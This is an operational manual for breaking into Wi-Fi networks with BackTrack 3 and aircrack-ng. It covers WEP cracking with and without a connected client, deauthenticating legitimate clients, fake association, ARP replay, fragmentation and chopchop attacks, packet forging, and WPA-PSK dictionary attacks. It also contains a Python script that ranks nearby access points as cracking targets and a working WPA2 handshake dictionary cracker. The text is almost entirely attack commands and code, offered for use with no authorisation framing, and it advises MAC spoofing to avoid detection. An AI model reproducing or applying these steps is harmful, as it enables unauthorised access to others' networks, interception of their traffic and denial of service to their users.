BT3 Crack WEP WPA Manual
0. Make bootable USB
Format the USB stick as FAT32 under Windows.
Mount bt3-usb.iso.
Copy the boot and BT3 folders onto the USB stick.
Run boot/bootinst.bat.
Boot the laptop from the USB stick and log in to the BT3 system (KDE). User: root  Password: toor
Start the desktop: #startx
If that gives a black screen, run the X configuration tool first and then try again: #xconf #startx
Note
If a command does not return immediately (airodump-ng and aireplay-ng keep running until you stop them), open a new shell to execute the next command.
Abbreviations
WNC: wireless network card, i.e. your own card.
AP: access point, i.e. the target.
1. CRACK OPEN WEP WITH VALID CLIENT ARP
Precondition
AP uses WEP encryption.
AP uses Open System authentication.
AP has a valid (associated) client.
The client only needs to send some valid ARP traffic.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load the monitor-capable driver for the Intel 3945. Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for the AP. Once you have the info (ESSID, MAC, channel, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. Optional. For safety, change the MAC of your WNC, e.g. to 11:11:11:11:11:11.
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 in monitor mode on the AP's channel.
#airmon-ng start wifi0 11
Optional. Show the working mode and channel of wifi0.
#iwconfig wifi0
Optional. Test the injection ability of your WNC.
#aireplay-ng -9 wifi0
Step6. Crack the AP key now. wesside-ng does the association, injection and cracking by itself.
#wesside-ng -i wifi0 -v 00:00:00:00:00:00
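Step3 of this and every following section is done by eye from the airodump-ng screen. airodump-ng can also write the same table to a CSV file (run it with -w <prefix>; the file is <prefix>-01.csv), which is easier to work with when many APs are in range. The Python script below is an added example, not part of the original manual: it parses a constructed sample in airodump-ng's CSV layout (the column order is assumed; compare it with your own file), attaches each associated station to its AP, and picks out the open-system WEP APs, which is exactly the information that decides whether sections 1-4 (client present) or section 5 (no client) apply.

```python
import csv

# Constructed sample in the column layout airodump-ng writes to <prefix>-01.csv
# (AP table, blank line, station table). All values are made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:00:00:00:00:00, 2008-06-01 10:00:00, 2008-06-01 10:05:00, 11, 54, WEP, WEP, OPN, -40, 120, 35, 0.0.0.0, 5, tenda,
AA:BB:CC:DD:EE:FF, 2008-06-01 10:00:00, 2008-06-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -70, 80, 0, 0.0.0.0, 6, office,
BB:BB:BB:BB:BB:BB, 2008-06-01 10:00:00, 2008-06-01 10:05:00, 1, 11, WEP, WEP, OPN, -75, 40, 2, 0.0.0.0, 4, lone,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
CC:CC:CC:CC:CC:CC, 2008-06-01 10:01:00, 2008-06-01 10:05:00, -50, 300, 00:00:00:00:00:00, tenda
DD:DD:DD:DD:DD:DD, 2008-06-01 10:01:00, 2008-06-01 10:05:00, -60, 10, (not associated), office,tenda
"""


def parse_airodump_csv(text):
    """Parse the AP and station tables into {bssid: {...}} with clients attached."""
    aps = {}
    stations = []
    section = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section = "ap"
            continue
        if line.startswith("Station MAC,"):
            section = "sta"
            continue
        fields = [f.strip() for f in next(csv.reader([line]))]
        if section == "ap" and len(fields) >= 14:
            aps[fields[0]] = {
                "channel": int(fields[3]),
                "privacy": fields[5],
                "auth": fields[7],
                "ivs": int(fields[10]),
                "essid": fields[13],
                "clients": [],
            }
        elif section == "sta" and len(fields) >= 6:
            stations.append({"mac": fields[0], "bssid": fields[5], "packets": int(fields[4])})
    # Attach associated stations to their AP; "(not associated)" rows are left out.
    for sta in stations:
        if sta["bssid"] in aps:
            aps[sta["bssid"]]["clients"].append(sta["mac"])
    return aps


def wep_targets(aps):
    """Keep only open-system WEP APs and say which part of the manual applies.

    Returns a list of (bssid, channel, essid, clients, manual_section)."""
    targets = []
    for bssid, ap in sorted(aps.items()):
        if ap["privacy"] != "WEP" or ap["auth"] not in ("OPN", ""):
            continue  # WPA/WPA2 or shared-key WEP: the WEP sections do not apply
        section = "section 5 (no client)" if not ap["clients"] else "sections 1-4 (client present)"
        targets.append((bssid, ap["channel"], ap["essid"], ap["clients"], section))
    return targets


if __name__ == "__main__":
    for bssid, ch, essid, clients, section in wep_targets(parse_airodump_csv(SAMPLE_CSV)):
        print(f"{bssid} ch{ch:>2} {essid:<8} clients={clients or '-'} -> {section}")
```

Run it against a real file with parse_airodump_csv(open("dumped_data-01.csv").read()); the "# IV" column is the same count that aircrack-ng needs to grow in the later steps.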
2. CRACK OPEN WEP WITH LOTS OF VALID CLIENT IVS DATA
Precondition
AP uses WEP encryption.
AP uses Open System authentication.
AP has a valid (associated) client.
The client generates plenty of valid traffic.
We can collect lots of IVs from the client's traffic.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load the monitor-capable driver for the Intel 3945. Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for the AP. Once you have the info (ESSID, MAC, channel, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. For safety, change the MAC of your WNC, e.g. to 11:11:11:11:11:11.
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 in monitor mode on the AP's channel.
#airmon-ng start wifi0 11
Show the working mode and channel of wifi0.
#iwconfig wifi0
Test the injection ability of your WNC.
#aireplay-ng -9 wifi0
Step6. Capture the IVs to a file. -w <file name prefix>, -c <channel>; --ivs saves only the IVs, not full frames. Leave this running in its own shell.
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Crack the AP key once enough IVs have been collected (the #Data column of Step6 keeps growing). -n 64 assumes a 40-bit key; use -n 128 for a 104-bit key.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
3. CRACK OPEN WEP WITH LESS VALID CLIENT IVS DATA
Precondition
AP uses WEP encryption.
AP uses Open System authentication.
AP has a valid (associated) client.
The client generates only a little valid traffic, so few IVs.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load the monitor-capable driver for the Intel 3945. Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for the AP. Once you have the info (ESSID, MAC, channel, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. For safety, change the MAC of your WNC, e.g. to 11:11:11:11:11:11.
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 in monitor mode on the AP's channel.
#airmon-ng start wifi0 11
Show the working mode and channel of wifi0.
#iwconfig wifi0
Test the injection ability of your WNC.
#aireplay-ng -9 wifi0
Step6. Capture the IVs to a file. -w <file name prefix>, -c <channel>; --ivs saves only the IVs, not full frames. Leave this running in its own shell.
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Use ARP request replay (-3) to generate lots of IVs. -h is the client's MAC, so the replayed ARP looks like it comes from the client. This step may wait a long time for the first ARP request; you can use another PC or laptop to connect to the AP and so supply one.
#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0
Step8. Crack the AP key now, as in section 2.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
4. CRACK OPEN WEP WITH VALID CLIENT BUT NO COMMUNICATION
Precondition
AP uses WEP encryption.
AP uses Open System authentication.
AP has a valid (associated) client.
The client is idle: it sends no traffic to the AP.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load the monitor-capable driver for the Intel 3945. Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for the AP. Once you have the info (ESSID, MAC, channel, whether it has a client, client MAC), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. For safety, change the MAC of your WNC, e.g. to 11:11:11:11:11:11.
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 in monitor mode on the AP's channel.
#airmon-ng start wifi0 11
Show the working mode and channel of wifi0.
#iwconfig wifi0
Test the injection ability of your WNC.
#aireplay-ng -9 wifi0
Step6. Capture the IVs to a file. -w <file name prefix>, -c <channel>; --ivs saves only the IVs, not full frames. Leave this running in its own shell.
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Start ARP request replay (-3) in its own shell. With an idle client there is nothing to replay yet, so it sits waiting for an ARP request.
#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0
Step8. In another shell, deauthenticate the client (-0) so that it reconnects. A reconnecting client normally sends an ARP request; Step7 captures and replays it, and the #Data count of Step6 starts to grow. -a is the AP, -c the client to kick off.
#aireplay-ng -0 10 -a 00:00:00:00:00:00 -c CC:CC:CC:CC:CC:CC wifi0
Step9. Crack the AP key now, as in section 2.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
5. CRACK OPEN WEP WITH OUT CLIENT
Precondition
AP uses WEP encryption.
AP uses Open System authentication.
AP has no client, so there is no client traffic to replay.
Turn on the wireless switch of your laptop.
Step1. Unload the iwl3945 driver of the Intel 3945 wireless net card (WNC).
#modprobe -r iwl3945
Step2. Load the monitor-capable driver for the Intel 3945. Other WNCs need a different loading procedure.
#modprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search for the AP. Once you have the info (ESSID, MAC, channel, whether it has a client), press Ctrl+C to stop the scan.
#airodump-ng wifi0
Suppose we find an AP as follows:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | (none) |
Step4. For safety, change the MAC of your WNC, e.g. to 11:11:11:11:11:11.
#macchanger -m 11:11:11:11:11:11 wifi0
Step5. Activate wifi0 in monitor mode on the AP's channel.
#airmon-ng start wifi0 11
Show the working mode and channel of wifi0.
#iwconfig wifi0
Test the injection ability of your WNC.
#aireplay-ng -9 wifi0
Step6. Capture the IVs to a file. -w <file name prefix>, -c <channel>; --ivs saves only the IVs, not full frames. Leave this running in its own shell.
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Since there is no client, we have to create a fake association with the AP ourselves. Associate your WNC with the AP now (fake authentication, -1).
#aireplay-ng -1 0 -e tenda -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Failure reasons
AP has a MAC filter.
Weak signal from the AP.
AP actually uses WPA.
Your WNC and the AP are on different channels.
Try
Drop the [-e tenda] parameter.
Set a lower rate, e.g. #iwconfig wifi0 rate 2M
To confirm the fake association, watch the authentication and association frames:
#tcpdump -n -e -s0 -vvv -i wifi0
There are three ways to do the remaining cracking work.
Case1
Step8. Use the interactive (-2) attack mode, which captures, selects and injects packets in one go. -p 0841 sets the frame control word to a data frame with the ToDS and WEP bits set, so it looks like client traffic; -c FF:FF:FF:FF:FF:FF selects broadcast frames.
#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Answer y to the question "Use this packet ?" to launch the attack. After enough IVs have been captured (the #Data column of Step6), crack with aircrack-ng.
Step9. Run aircrack-ng.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
Case2
Step8. Use the fragmentation attack (-5) to obtain an xor file containing the keystream (PRGA) for one IV. The generated file name starts with "fragment".
#aireplay-ng -5 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Step9. Using the xor file, create a fake ARP packet. -y <xor file>, -w <output file for the forged ARP>.
#packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w myarp
Step10. Inject the forged packet with the interactive (-2) mode. -r <forged ARP file>, -x <packets per second>, less than 1024. The interface is wifi0 as in the steps above.
#aireplay-ng -2 -r myarp -x 256 wifi0
The #Data count in the window of Step6 will grow rapidly. When it reaches about 15,000, crack with aircrack-ng.
Step11. Run aircrack-ng.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
Case3
Step8. Use the chopchop attack (-4) to obtain an xor file with the keystream for one IV. The generated file name starts with "replay_dec".
#aireplay-ng -4 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Step9. Using the xor file, create a fake ARP packet. -y <xor file>, -w <output file for the forged ARP>.
#packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-xxxx-xxxxxx.xor -w myarp
Step10. Inject the forged packet with the interactive (-2) mode. -r <forged ARP file>, -x <packets per second>, less than 1024.
#aireplay-ng -2 -r myarp -x 256 wifi0
The #Data count in the window of Step6 will grow rapidly. When it reaches about 15,000, crack with aircrack-ng.
Step11. Run aircrack-ng.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
Injection Note
If the #Data count does not grow and stays at 0 during injection, try the following.
Method1. Move your PC or laptop to get a better signal for your WNC.
Method2. While the injection attack is running, re-issue the fake authentication several times to keep the association with the AP alive:
#aireplay-ng -1 0 -e tenda -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Method3. In the -2 attack mode, add the -F parameter (take the first matching packet without asking):
#aireplay-ng -2 -F -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Method4. While the program is waiting for an injectable packet, use another PC or laptop to connect to the AP and enter any random password at the password prompt. The waiting program will capture an injectable packet from that attempt and complete the injection.
aireplay-ng attack specification
-0 deauthenticate: deauthentication mode
Forces an already-associated legitimate client to disconnect from the AP so that it reconnects. The reconnection produces authentication traffic and then a valid ARP request. If a client is associated but nobody is using the network, there is no traffic and even -3 cannot obtain a valid ARP request; in that case run -0 together with -3, and the -3 attack fires immediately.
#aireplay-ng -0 10 -a <ap mac> -c <client mac> wifi0
Parameters:
-0: deauthentication mode, followed by the number of deauth packets to send (0 = loop endlessly; the client is kept off the network).
-a: MAC of the AP.
-c: MAC of the associated legitimate client. Without -c, all clients of the AP are deauthenticated.
#aireplay-ng -3 -b <ap mac> -h <client mac> wifi0
Note: this combination requires a legitimate, authenticated client associated with the router.
-1 fakeauth count: fake client association
This mode pretends to be a client and associates with the AP.
It is the first step of clientless cracking: since no legitimate client is associated, a fake client has to associate with the router. For the AP to accept packets, your card must be associated with it; otherwise the target AP ignores every frame from your card and no IVs are produced. Only after -1 has associated successfully can you send injection traffic that the router accepts and answers, which yields the packets with new IVs.
#aireplay-ng -1 0 -e <ap essid> -a <ap mac> -h <my mac> wifi0
Parameters:
-1: fake authentication mode, followed by the re-association delay in seconds (0 = associate once).
-e: ESSID of the AP.
-a: MAC of the AP.
-h: MAC of the fake client (your own card's MAC).
-2 interactive: interactive mode
This mode combines capturing packets, selecting one and injecting it.
1. Mainly used for clientless cracking: first build a fake association with -1, then inject directly.
#aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
Parameters:
-2: interactive mode.
-p: frame control word (hex) to set in the injected frame; 0841 = data frame with the ToDS and WEP bits set, so the frame looks as if sent by a client.
-c: destination MAC (ff:ff:ff:ff:ff:ff = broadcast).
-b: MAC of the AP.
-h: source MAC, i.e. your own card's MAC (the fake client).
2. Replay a packet read from a file, e.g. one forged by packetforge-ng:
#aireplay-ng -2 -r <file> -x 1024 wifi0
-x 1024 limits the sending rate to avoid hanging the card; 1024 packets per second is a usable value.
-3 ARP request: ARP request replay mode
This mode captures ARP requests and re-sends them.
It is very effective. It works with a legitimate client, or with the fake client associated via -1. With a legitimate client you usually wait a few minutes for traffic between the client and the AP; a small amount of traffic is enough to yield a valid ARP request, and then -3 injection succeeds. If there is no traffic at all, no ARP request is obtained and the attack fails; if the client and AP produce no ARP request for a long time, run a -0 attack at the same time.
Without a legitimate client, first associate a fake client with -1. -3 alone will not see an ARP request then; obtain an injectable packet with -2, -4 or -5 as in section 5 and inject it with -2 -r.
#aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
Parameters:
-3: ARP request replay mode.
-b: MAC of the AP.
-h: source MAC to replay with: the legitimate client's MAC, or your own card's MAC when using the -1 fake association.
-x: packets sent per second, at most 1024; 512 is recommended (may be omitted).
-4 chopchop: chopchop attack mode
Obtains an xor file containing the keystream of one packet.
This mode mainly obtains a usable xor file containing keystream (PRGA) data. This is not the WEP key and cannot decrypt other packets; it is used to build a new packet that we can inject.
#aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
Parameters:
-b: MAC of the AP to crack.
-h: MAC of the fake association (your own card's MAC).
-5 fragment: fragmentation attack mode
Obtains PRGA (keystream), saved in a file with the .xor suffix.
This mode mainly obtains usable PRGA. The PRGA is not the WEP key and cannot decrypt packets; it is used to build a new packet for injection. It works by making the target AP rebroadcast packets; each rebroadcast carries a new IV, and that is what we exploit.
#aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
-5: fragmentation attack mode.
-b: MAC of the AP.
-h: MAC of the fake association (your own card's MAC).
packetforge-ng data packet builder
packetforge-ng <mode> <options>
Mode
-0: forge an ARP packet
#packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 -l 255.255.255.255 -y <.xor file> -w myarp
Parameters:
-0: forge an ARP request.
-a: MAC of the AP.
-h: MAC of the fake association (your own MAC), used as the source MAC.
-k <IP[:port]>: destination IP (and port).
-l <IP[:port]>: source IP (and port).
-y <.xor file>: read the PRGA from the xor file, followed by the file name.
-w: file name to write the forged ARP packet to.
packetforge-ng takes no interface name; the forged packet is injected afterwards with aireplay-ng -2 -r myarp.
aircrack-ng WEP WPA-PSK key cracker
aircrack-ng [options] <.cap/.ivs file>
Options
#aircrack-ng -n 64 -b <ap mac> name-01.ivs
Parameters:
-n: WEP key length in bits (64/128/152/256/512); 64 = 40-bit key, 128 = 104-bit key.
-b: BSSID (AP MAC) to crack.
#aircrack-ng -x -f 2 name-01.cap
Parameters:
-x (same as -x0): disable brute forcing of the last key bytes; -x1 brute-forces the last byte, -x2 the last two. WEP only.
-f: fudge factor for WEP cracking (default 2); a higher value tries more key candidates, slower but more likely to succeed. It has no effect on WPA.
#aircrack-ng -w password.txt ciw.cap
-w: dictionary mode, followed by the wordlist file and then the capture file in which we saved the captured WPA handshake. WPA-PSK can only be attacked by dictionary, and the capture must hold a full 4-way handshake, so record it with airodump-ng without --ivs.
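The dictionary mode above (-w) works because WPA-PSK derives every key from the passphrase and the SSID, and the handshake's MIC lets each candidate be checked offline. The Python below is an added example, not the original manual's or aircrack-ng's code: it derives PMK, PTK and KCK, builds a constructed EAPOL-Key message 2 of the 4-way handshake signed with a hypothetical passphrase, and runs a small wordlist against it the way aircrack-ng -w does. The SSID, MACs, nonces and passphrase are made up; the key-derivation constants are the 802.11i ones for WPA2/CCMP (key descriptor version 2, HMAC-SHA1 MIC).

```python
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields before the MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """802.11i PRF-512 'Pairwise key expansion'; the first 16 bytes of the PTK are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 of the 4-way handshake (constructed for this example)."""
    body = (b"\x02"                     # descriptor type: RSN key
            + b"\x01\x0a"               # key info: version 2, pairwise, MIC present
            + b"\x00\x10"               # key length
            + (1).to_bytes(8, "big")    # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + mic + b"\x00\x00")        # MIC, key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(ssid, ap_mac, sta_mac, anonce, eapol_msg2, wordlist):
    """aircrack-ng -w style attack: derive PMK/PTK per candidate and compare the MIC.
    The SNonce is read from the frame itself; the ANonce comes from message 1."""
    snonce = eapol_msg2[17:49]
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


# Constructed handshake: the passphrase, nonces and addresses below are hypothetical.
SSID = "tenda"
AP_MAC = bytes.fromhex("000000000000")
STA_MAC = bytes.fromhex("cccccccccccc")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "tenda12345"


def make_capture() -> bytes:
    """Produce message 2 with a valid MIC, standing in for the capture aircrack-ng reads."""
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, unsigned))


if __name__ == "__main__":
    msg2 = make_capture()
    print(crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, msg2, ["password", "12345678", "tenda12345"]))
```

Each candidate costs 4096 HMAC-SHA1 rounds, which is why a long random PSK is out of reach while a dictionary word falls in seconds; note that the SSID is part of the salt, so a PMK computed for one SSID is useless against another.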
Frequently asked questions
Question1: When starting BT3, I get a black screen after typing startx.
Answer: After entering the user name root and password toor, type xconf. The screen goes black for a while, then the prompt returns; now type startx to enter the window manager. If you still cannot get into the window manager, you can type the cracking commands directly at the prompt: Alt+F1 opens the first shell, Alt+F2 the second, Alt+F3 the third, and so on. Use the PRINT SCREEN key to close a window.
Question2: In BT3 the kismet window flashes up and disappears.
Answer: First check that the card is present: ifconfig -a rausb0, and start monitoring: airmon-ng start rausb0. Then open /usr/local/etc/kismet.conf and, below the line channelsplit=true, add the line
source=rt2500,rausb0,monitor
Note:
For the WUSB54G v4 the source must be rt2500, not the rt2570 shown when the driver loads. Owners of a 3945 card add source=ipw3945,eth0,IPW3945 instead.